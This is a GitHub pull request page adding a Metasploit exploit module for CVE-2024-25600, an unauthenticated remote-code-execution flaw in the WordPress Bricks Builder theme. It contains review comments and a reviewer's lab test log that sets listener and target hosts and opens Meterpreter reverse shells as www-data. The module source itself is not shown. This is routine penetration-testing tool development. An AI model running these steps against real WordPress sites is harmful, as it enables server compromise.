Add wp_bricks_builder_rce (CVE-2024-25600) #18891
Merged
Conversation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Chocapikk
changed the title
|
Hello, I wanted to know about the "Sanity Test Execution", since the changes in my code, it no longer validates this test. I would like some help on this, thank you. EDIT: Just a bug |
Chocapikk
force-pushed
the
wp_bricks_builder_rce
branch
from
b12490c
to
45ae984
Compare
sjanusz-r7
reviewed
Feb 29, 2024
Chocapikk
force-pushed
the
wp_bricks_builder_rce
branch
from
4a861e9
to
45ae984
Compare
|
I think the change seems pretty legit, thanks! 👍 I think |
|
Hello @jheysel-r7 Any news about the module? Thanks 🙂 |
jheysel-r7
reviewed
Mar 26, 2024
There was a problem hiding this comment.
Thanks for the great module @Chocapikk! I've left a couple minor suggestions. Testing was as expected:
ARCH_PHP
msf6 exploit(multi/http/wp_bricks_builder_rce) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(multi/http/wp_bricks_builder_rce) > set rhost 127.0.0.1
rhost => 127.0.0.1
msf6 exploit(multi/http/wp_bricks_builder_rce) > set rport 8000
rport => 8000
msf6 exploit(multi/http/wp_bricks_builder_rce) > set ssl false
[!] Changing the SSL option's value may require changing RPORT!
ssl => false
msf6 exploit(multi/http/wp_bricks_builder_rce) > run
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] WordPress Version: 6.4.3
[+] Detected Bricks theme version: 1.8
[+] The target appears to be vulnerable.
[+] Nonce retrieved: c5e035c396
[*] Sending stage (39927 bytes) to 172.16.199.1
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.1:56073) at 2024-03-26 12:05:11 -0700
[*] Sending stage (39927 bytes) to 172.16.199.72
meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer : 29292f368fe3
OS : Linux 29292f368fe3 6.6.16-linuxkit #1 SMP PREEMPT_DYNAMIC Fri Feb 16 11:55:08 UTC 2024 x86_64
Meterpreter : php/linux
meterpreter >exit
ARCH_CMD
msf6 exploit(multi/http/wp_bricks_builder_rce) > set target 2
target => 2
msf6 exploit(multi/http/wp_bricks_builder_rce) > run
[*] Started reverse TCP handler on 172.16.199.1:8000
[*] Running automatic check ("set AutoCheck false" to disable)
[*] WordPress Version: 6.4.3
[+] Detected Bricks theme version: 1.8
[+] The target appears to be vulnerable.
[+] Nonce retrieved: c5e035c396
[*] Sending stage (3045380 bytes) to 172.16.199.1
[*] Meterpreter session 3 opened (172.16.199.1:8000 -> 172.16.199.1:56169) at 2024-03-26 12:08:17 -0700
meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer : 172.22.0.3
OS : Debian 12.5 (Linux 6.6.16-linuxkit)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
|
Hello @jheysel-r7 , I don't think I need to make any changes except to add your suggestions and fix the typos, tested on my lab and it's good too. Thanks for the changes and the explanations as well ! |
jheysel-r7
closed this pull request by merging all changes
into
rapid7:master
in
abb2eb7
Release NotesThis PR adds an exploit module that targets a known vulnerability, CVE-2024-25600, in the WordPress Bricks Builder Theme, versions prior to 1.9.6. |
jheysel-r7
added
the
rn-modules
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
This pull request introduces the
wp_bricks_builder_rceexploit module that targets a known vulnerability in the Bricks Builder plugin for WordPress. The module has been developed following the best practices outlined in the Metasploit Framework documentation and has been thoroughly tested to ensure reliability and effectiveness.Comprehensive documentation has been included to facilitate understanding and usage of the module by other security professionals and developers.
I believe this module will be a valuable addition to the Metasploit Framework and look forward to any feedback or suggestions for improvement.
Best regards,
Chocapikk